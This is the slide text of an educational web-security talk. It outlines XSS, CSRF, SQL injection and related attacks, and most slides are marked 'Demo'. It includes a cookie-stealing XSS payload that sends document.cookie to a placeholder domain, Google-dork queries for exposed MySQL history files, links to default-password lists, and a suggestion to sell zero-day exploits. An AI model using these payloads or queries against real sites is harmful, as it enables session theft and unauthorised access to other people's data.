S5 - The web developer's way

• this presentation is made using S5 presentation system
• press page down to move to the next slide
• press page up to move to the previous slide
• press t to change to toggle from presentation mode to text mode
• visit http://meyerweb.com/eric/tools/s5/ for more information
• S5 uses XHTML( content) Javascripting (dynamic aspects) and CSS (layout)
• Podium is similar presentation system that uses PHP instead of Javascripting

Disclaimer

This talk is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code is to be used on your testing environment only. SLMG and myself are not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this talk.

Hacking the Web

• Deepan Chakravarthy N
• codeshepherd AT gmail DOT com

JavaScript Welcome

• javascript:alert('Welcome!! Here goes the WebSecurity Talk!!) paste this in the url and hit enter

Introduction

• What is websecurity?
• Google revealing youtube password
• Mysql injection in Simplog exposing pasword hash
• 56000 Email IDs and Passwords from Myspace Philishing
• Yahoo Philishing

Most Popular Techniques

• Most popular techniques
  
  XSS (cross site scripting), CSRF (cross site reverse forgery), SQL Injection, Persistant HTML Injection, HRS (HTTP Response Splitting), RFI (remote file injection), LFI (local file include), DNS Pinning, CRLF (carriage return, line feed), MITM (man in the middle attack), AJAX/JSON hijacking, Anti-DNS pinning, Canonicalization, URL Redirection

• Click here for the complete list.

XSS - Cross Site Scripting

• Demo

XSS - Google Code Search

• echo\s\$_GET lang:php

Cookie stealing with XSS

• insert images, hrefs etc with fake links http://mydomain.com?cookies=<script>encodeURI(document.cookie)</script>
• demo

CSRF - Cross Site Reverse Forgery

• Demo

SQL Injection

• Demo

HTTP Response Splitting

• Demo
• Also known as CRLF (Carriage Return, Line Feed) attack
• http://www.google.com/local_url?q=http://www.yahoo.com

Cheat Sheets

• XSS Cheat Sheet - http://ha.ckers.org/xss.html
• SQL Injection Cheat Sheet - http://ha.ckers.org/sqlinjection.html

XSS GreaseMonkey Assiatant

• Demo

Cal9000

• Demo

WebScarab

• Demo

WebGoat

• Demo

Samy's worm diagnosis

• History
• Detailed Explaination http://web.archive.org/web/20060208182348/namb.la/popular/tech.html

Google Hacking Database

• http://johnny.ihackstuff.com/ghdb.php
• files containing password intitle:"Index of" .mysql_history
• read files from server. inurl:jsp?PageName=/

Yahoo Pipes

• demo
• http://pipes.yahoo.com

Databases and repositories

• Default password database http://www.redoracle.com/index.php?option=com_password&task=rlist ; Eg tomcat, google query inurl:8080
• Default password database http://www.phenoelit-us.org/dpl/dpl.html
• Google Query eg: inurl:8080
• POC repository http://www.xssed.com/

bookmarklets

• JS shell
• JS fun, image dancing

Changing UserAgent

• pretending to be search engine

how to prevent

• CORE GRASP for php
• anti XSS libraries
• Acegi Tag library ??
• firefox without JS

Full disclosure monthly Events

• search engine bugs
• Script mapping project

Hacking for fun and profit

• sell 0 day exploits
• disclose vulnerabilities to appropriate companies and get recognized

links

• Link to Slides: http://www.codeshepherd.com/talks/hackingtheweb.html
• Black hat videos: http://mirrors.easynews.com/blackhat/